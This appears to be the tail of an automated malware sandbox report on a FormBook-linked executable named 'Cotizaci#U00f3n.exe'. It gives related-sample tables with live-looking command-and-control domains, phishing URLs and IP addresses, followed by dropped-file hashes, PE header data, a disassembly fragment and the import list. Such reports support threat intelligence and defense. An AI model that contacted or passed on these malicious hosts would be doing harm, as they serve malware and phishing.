              PO# Q919240.exeGet hashmaliciousFormBookBrowse
              • www.kexweb.top/3bdq/
              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
              • www.kexweb.top/3bdq/
              k8FSEGGo4d9blGr.exeGet hashmaliciousFormBookBrowse
              • www.balclub.top/n6ow/
              PO #86637.exeGet hashmaliciousFormBookBrowse
              • www.kexweb.top/3bdq/
              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
              • www.kexweb.top/3bdq/
              ORDER_pdf.exeGet hashmaliciousFormBookBrowse
              • www.kexweb.top/mfb2/
              ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
              • www.kexweb.top/mfb2/
              13.248.169.48LOL and profile.exeGet hashmaliciousFormBookBrowse
              • www.smilechat.shop/ih4n/
              ADNOC REQUESTS & reviews.exeGet hashmaliciousFormBookBrowse
              • www.smilechat.shop/ih4n/
              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
              • www.study-in-nyc.online/f1gw/
              GestionPagoAProveedores_100920241725998901306_PDF.cmdGet hashmaliciousRemcos, DBatLoader, FormBookBrowse
              • www.sleephygienist.org/9ned/
              NEW ORDERS scan_29012019.exeGet hashmaliciousFormBookBrowse
              • www.luxe.guru/s9un/
              Petronas request for-quotation.exeGet hashmaliciousFormBookBrowse
              • www.smilechat.shop/ih4n/
              New Purchase Order.exeGet hashmaliciousFormBookBrowse
              • www.sapatarias.online/ep7t/
              PROFORMA INVOICE BKS-0121-24-25-JP240604.exeGet hashmaliciousFormBookBrowse
              • www.healthsolutions.top/cent/
              New Purchase Order.exeGet hashmaliciousFormBookBrowse
              • www.dyme.tech/pjne/?lt=lhp2AL1o8WnbXPZMRwuNwZPsCjGMimAytiXH6n0uWTdA0JaaykggGBvZUdK/udhaMgulQSxiSbl+DIpIo1gQvhEzJQCgKGJIbKmEGc+7pbgyQptTpIVqrWg=&3ry=nj20Xr
              OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
              • pupydeq.com/login.php
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              www.nobartv6.websitePAGO $830.900.exeGet hashmaliciousFormBookBrowse
              • 103.224.182.242
              PO #86637.exeGet hashmaliciousFormBookBrowse
              • 103.224.182.242
              RFQ- PNOC- MR 29215 - PJ 324 AL SAILIYA MOSQUE Project.exeGet hashmaliciousFormBookBrowse
              • 103.224.182.242
              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
              • 103.224.182.242
              New_Order_Big_Bag_PDF.exeGet hashmaliciousFormBookBrowse
              • 103.224.182.242
              webredir.vip.gandi.netES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              PO# Q919240.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              PO098765678.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              Order#Qxz091124.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
              • 217.70.184.50
              www.elsupertodo.netPO# Q919240.exeGet hashmaliciousFormBookBrowse
              • 148.72.152.174
              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
              • 148.72.152.174
              FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
              • 148.72.152.174
              PO #86637.exeGet hashmaliciousFormBookBrowse
              • 148.72.152.174
              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
              • 148.72.152.174
              COTIZACION 280824.exeGet hashmaliciousFormBookBrowse
              • 148.72.152.174
              www.kexweb.topPO# Q919240.exeGet hashmaliciousFormBookBrowse
              • 63.250.47.40
              PAGO $830.900.exeGet hashmaliciousFormBookBrowse
              • 63.250.47.40
              PO #86637.exeGet hashmaliciousFormBookBrowse
              • 63.250.47.40
              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
              • 63.250.47.40
              ORDER_pdf.exeGet hashmaliciousFormBookBrowse
              • 63.250.47.40
              ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
              • 63.250.47.40
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              ATT-INTERNET4USPO# Q919240.exeGet hashmaliciousFormBookBrowse
              • 172.191.244.62
              Tsunami.arm.elfGet hashmaliciousMiraiBrowse
              • 172.12.118.97
              http://s--sso---uphold-cdn-auth.webflow.io/Get hashmaliciousHTMLPhisherBrowse
              • 13.32.27.68
              https://web-metmsk-chrmxtens.gitbook.io/Get hashmaliciousHTMLPhisherBrowse
              • 13.32.27.107
              fzbl2RfIlG.exeGet hashmaliciousAsyncRAT, DcRatBrowse
              • 172.31.139.194
              http://is.gd/EmlK8CGet hashmaliciousUnknownBrowse
              • 13.32.23.8
              8zzBr1gT31.elfGet hashmaliciousMiraiBrowse
              • 12.82.79.92
              GyFcTadTZv.elfGet hashmaliciousMiraiBrowse
              • 12.73.170.234
              iZP1hJhnmz.elfGet hashmaliciousMiraiBrowse
              • 12.170.82.64
              dAlxfXyNm7.elfGet hashmaliciousMiraiBrowse
              • 12.197.137.121
              AMAZON-02USES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
              • 13.248.169.48
              LOL and profile.exeGet hashmaliciousFormBookBrowse
              • 52.31.71.192
              ADNOC REQUESTS & reviews.exeGet hashmaliciousFormBookBrowse
              • 52.31.71.192
              RFQ.xlsxGet hashmaliciousUnknownBrowse
              • 3.5.218.51
              CLlCK.docxGet hashmaliciousUnknownBrowse
              • 18.239.83.10
              CLlCK.docxGet hashmaliciousUnknownBrowse
              • 100.21.182.177
              https://comcast-0006.vercel.app/Get hashmaliciousUnknownBrowse
              • 52.58.21.105
              http://facebook-business-support-home-page8.ubpages.com/1000056568746/Get hashmaliciousUnknownBrowse
              • 13.224.189.63
              https://swisscome.blogspot.my/Get hashmaliciousUnknownBrowse
              • 18.239.83.77
              https://swisscome.blogspot.se/Get hashmaliciousUnknownBrowse
              • 108.138.26.31
              HOSTNETNLPAGO $830.900.exeGet hashmaliciousFormBookBrowse
              • 91.184.0.200
              FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
              • 91.184.0.200
              PASU5160894680 DOCS.scr.exeGet hashmaliciousFormBookBrowse
              • 91.184.0.200
              z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
              • 91.184.0.111
              firmware.x86_64.elfGet hashmaliciousUnknownBrowse
              • 91.184.0.99
              PO #86637.exeGet hashmaliciousFormBookBrowse
              • 91.184.0.200
              DEBIT NOTE July 2024 PART 2.exeGet hashmaliciousFormBookBrowse
              • 91.184.0.200
              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
              • 91.184.0.200
              ORDER_pdf.exeGet hashmaliciousFormBookBrowse
              • 91.184.0.200
              GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exeGet hashmaliciousFormBookBrowse
              • 91.184.0.200
              NAMECHEAP-NETUSES-241-29335_pdf.exeGet hashmaliciousFormBookBrowse
              • 63.250.47.40
              Request for Quotation Hi-Tech Park Project 193200.exeGet hashmaliciousFormBookBrowse
              • 199.192.21.169
              LOL and profile.exeGet hashmaliciousFormBookBrowse
              • 162.0.236.169
              RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
              • 162.0.238.246
              PO# Q919240.exeGet hashmaliciousFormBookBrowse
              • 63.250.47.40
              ADNOC REQUESTS & reviews.exeGet hashmaliciousFormBookBrowse
              • 162.0.236.169
              https://suspokertellscractor-f7a93a.ingress-florina.ewp.live/wp-content/plugins/unsemitions/infospage.phpGet hashmaliciousUnknownBrowse
              • 63.250.43.136
              http://siddiquimehvish07.github.io/neflixclone.github.ioGet hashmaliciousHTMLPhisherBrowse
              • 162.0.235.241
              https://tracking.dailyhealthalliance.com/index.php/lists/ow833rolea56c/unsubscribe/fd2523medreca/yc5259nwzeGet hashmaliciousUnknownBrowse
              • 199.188.201.195
              LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
              • 162.0.238.246
              No context
              No context
              Process:C:\Windows\SysWOW64\netbtugc.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
              Category:dropped
              Size (bytes):196608
              Entropy (8bit):1.1209935793793442
              Encrypted:false
              SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
              MD5:214CFA91B0A6939C4606C4F99C9183B3
              SHA1:A36951EB26E00F95BFD44C0851827A032EAFD91A
              SHA-256:660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
              SHA-512:E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\Desktop\Cotizaci#U00f3n.exe
              File Type:data
              Category:dropped
              Size (bytes):286720
              Entropy (8bit):7.99315537004394
              Encrypted:true
              SSDEEP:6144:+srGCqWZ3beWhNomheecISBqVkQmtRRs3uDbpjUzdJIAeC60WJIl:+rWZBhNomhpSBqOQ0Y3e12kzPal
              MD5:8748221AFFF1222568FB9C4178F81865
              SHA1:D4F18F4739A82BF5FF0359C4F3957AA01B639A16
              SHA-256:2D7CE6356D167ADF164B9E7910FFB010351524192B47C4217F32E4E56EF15C78
              SHA-512:CEE45DBB0DBEF0B2F6CA974F6173D397D6B0E618939EC41CF3C1755E090889D34294081F8C0F416752909DD662E8668D124532BAC70745B0C24B82FED4E2833C
              Malicious:false
              Reputation:low
              Preview:.....NG9Wl.B.....4J...MO..IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4.JKF<Q.7W.@.j.3....\ 9k6@! K6Yi)*(\!3.5Qi8>(.')..{.j&)V+i4Z>mJKF2NG9.5@.v&U.zY0.t*,.(...mT..Q...{Y0.S.... ..]*"v&U.G9W4IJKFb.G9.5HJ....G9W4IJKF.NE8\5BJK.6NG9W4IJKF"ZG9W$IJK&6NG9.4IZKF2LG9Q4IJKF2NA9W4IJKF2.C9W6IJKF2NE9..IJ[F2^G9W4YJKV2NG9W4YJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJe2W639W4-.OF2^G9WzMJKV2NG9W4IJKF2NG9w4I*KF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4IJKF2NG9W4
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.541780586492084
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:Cotizaci#U00f3n.exe
              File size:1'364'003 bytes
              MD5:6a246a44fb8910b98fae3fc6ecdaa411
              SHA1:491f62c383b3637603754ddfba5c8a3afe6dffb7
              SHA256:34cdc9dbeed25021f6a572352cc75a2c6b4fa6c273b89b55219e83f6c2466992
              SHA512:4306fed56ba205dbf5acfde42b37a761e4b9f332bf40d9dcd9c6a3bdd1125dba232a73046088431d6781a739786685e4dba1d66c9adc4e349338ab289062acd6
              SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCqDs9C3IfUF8wj4IyQS7cVE5jYywy40XiMOuAy:7JZoQrbTFZY1iaCf9zU8XQOjYDmO6
              TLSH:1755F121B5C69076C2B323719E7EF76A963D79360327D29B33C82E215E605416B3A733
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
              Icon Hash:1733312925935517
              Entrypoint:0x4165c1
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              DLL Characteristics:TERMINAL_SERVER_AWARE
              Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:0
              File Version Major:5
              File Version Minor:0
              Subsystem Version Major:5
              Subsystem Version Minor:0
              Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
              Instruction
              call 00007F11C0BBA42Bh
              jmp 00007F11C0BB129Eh
              int3
              int3
              int3
              int3
              int3
              push ebp
              mov ebp, esp
              push edi
              push esi
              mov esi, dword ptr [ebp+0Ch]
              mov ecx, dword ptr [ebp+10h]
              mov edi, dword ptr [ebp+08h]
              mov eax, ecx
              mov edx, ecx
              add eax, esi
              cmp edi, esi
              jbe 00007F11C0BB141Ah
              cmp edi, eax
              jc 00007F11C0BB15B6h
              cmp ecx, 00000080h
              jc 00007F11C0BB142Eh
              cmp dword ptr [004A9724h], 00000000h
              je 00007F11C0BB1425h
              push edi
              push esi
              and edi, 0Fh
              and esi, 0Fh
              cmp edi, esi
              pop esi
              pop edi
              jne 00007F11C0BB1417h
              jmp 00007F11C0BB17F2h
              test edi, 00000003h
              jne 00007F11C0BB1426h
              shr ecx, 02h
              and edx, 03h
              cmp ecx, 08h
              jc 00007F11C0BB143Bh
              rep movsd
              jmp dword ptr [00416740h+edx*4]
              mov eax, edi
              mov edx, 00000003h
              sub ecx, 04h
              jc 00007F11C0BB141Eh
              and eax, 03h
              add ecx, eax
              jmp dword ptr [00416654h+eax*4]
              jmp dword ptr [00416750h+ecx*4]
              nop
              jmp dword ptr [004166D4h+ecx*4]
              nop
              inc cx
              add byte ptr [eax-4BFFBE9Ah], dl
              inc cx
              add byte ptr [ebx], ah
              ror dword ptr [edx-75F877FAh], 1
              inc esi
              add dword ptr [eax+468A0147h], ecx
              add al, cl
              jmp 00007F11C3029C17h
              add esi, 03h
              add edi, 03h
              cmp ecx, 08h
              jc 00007F11C0BB13DEh
              rep movsd
              jmp dword ptr [00000000h+edx*4]
              Programming Language:
              • [ C ] VS2010 SP1 build 40219
              • [C++] VS2010 SP1 build 40219
              • [ C ] VS2008 SP1 build 30729
              • [IMP] VS2008 SP1 build 30729
              • [ASM] VS2010 SP1 build 40219
              • [RES] VS2010 SP1 build 40219
              • [LNK] VS2010 SP1 build 40219
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
              RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
              RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
              RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
              RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
              RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
              RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
              RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
              RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
              RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
              RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
              RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
              RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
              RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
              RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
              RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
              RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
              RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
              RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
              RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
              RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
              RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
              RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
              RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
              RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
              RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
              RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
              DLLImport
              WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
              VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
              COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
              MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
              WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
              PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
              USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
              KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
              USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
              GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
              ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
              SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
